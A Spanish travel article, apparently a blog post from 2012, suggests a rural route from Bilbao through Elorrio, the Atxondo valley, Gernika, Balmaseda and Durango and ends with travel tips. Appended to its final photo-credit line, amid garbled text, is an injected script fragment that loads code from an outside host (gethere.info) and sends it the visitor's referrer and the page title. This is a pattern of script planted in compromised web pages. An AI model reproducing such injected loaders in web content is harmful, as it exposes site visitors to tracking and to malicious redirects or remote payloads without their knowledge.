Piedra y mugidos en Vizcaya

23/10/2012

Bilbao lleva los últimos años de la mano de la modernidad, pero a veces apetece un descanso. Y eso no es difícil en la capital vizcaína, ya que a dos pasos está el campo, la tierra, las raíces y la hierba. ¿Que le ha sobrado un día en su visita a Euskadi? Eso se arregla pronto. Aquí proponemos una ruta por casas de pueblo y paisajes verdes. A 41 kilómetros del Guggenheim se encuentra Elorrio, donde lo mejor es callejear, perderse y descubrir de repente los bellos casones de piedra y sillería labrada, como Arezpakotxaga e Iturbe. En nuestro paseo nos toparemos con el Ayuntamiento y la Basílica de la Inmaculada Concepción, la Puerta de Don Tello (la única que queda de las murallas), el Monasterio de Santa Ana y la Parroquia de San Agustín de Etxebarría, junto a la carretera y los prados. También en medio del color verde existe un lugar peculiar: la Necrópolis de Argiñuela, una de las mejores conservadas del País Vasco, con restos medievales. Plan perfecto para reflexionar sobre la vida, la muerte y nuestra propia existencia.

El mugido de las vacas del Valle de Atxondo no nos despierta de nuestra ensoñación. Los 5 kilómetros de vía verde pasan por el río Arrazola, Axpe Marzana (con su torre-palacio y la Iglesia de San Martín), la Ermita de San Roque, dos molinos y muchos nogales, cerezos y avellanos. No nos quita el ojo en ningún momento el Monte Anboto, casi sagrado para la mitología vasca. El paseo abre el apetito. Para eso están aquí mismo los restaurantes Mendi Goikoa y Etxebarri, este último especializado en carne. No son baratos, pero se come bien y se pasa un rato agradable.

Gernika se halla en el Valle del río Oka, cerca de la Reserva Natural del Urdaibai, cuya Cueva de Santimamiñe (en Kortezubi) tiene unas pinturas rupestres equiparables a las famosas de Altamira. No podrá perderse la Casa de Juntas de Guernika, símbolo de Euskadi, y su árbol. Este pueblo, asolado en 1937 por los bombardeos al servicio de Franco, es hoy más que nunca símbolo de paz y libertad. Los palacios vuelven a surgir en Balmaseda, en la Comarca de Las Encartaciones. Las calles medievales y el Puente Viejo sobre el río Cadagua (ideal para pasarse allí un rato con la vista perdida en los saltos de agua) le encantarán. En Durango hay más piedra, como la del Arco de Santa Ana, la Iglesia de Santa María de Uribarri y la Capilla de la Vera Cruz. Y a 5 minutos del casco antiguo, el Parque de Tabira, un auténtico bosque donde volver a perderse en mitad de la naturaleza.

Datos útiles:

  • Vizcaya tiene 1.155.772  habitantes.
  • El tiempo es lluvioso en invierno y poco caluroso en verano.
  • Iberia ofrece vuelos directos a Bilbao (hasta 10 frecuencias diarias). Para conseguir los vuelos más baratos, entra en www.iberia.com y seleccione “soy flexible en fechas”.

Foto | Roberto AI (empordako aharia)s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;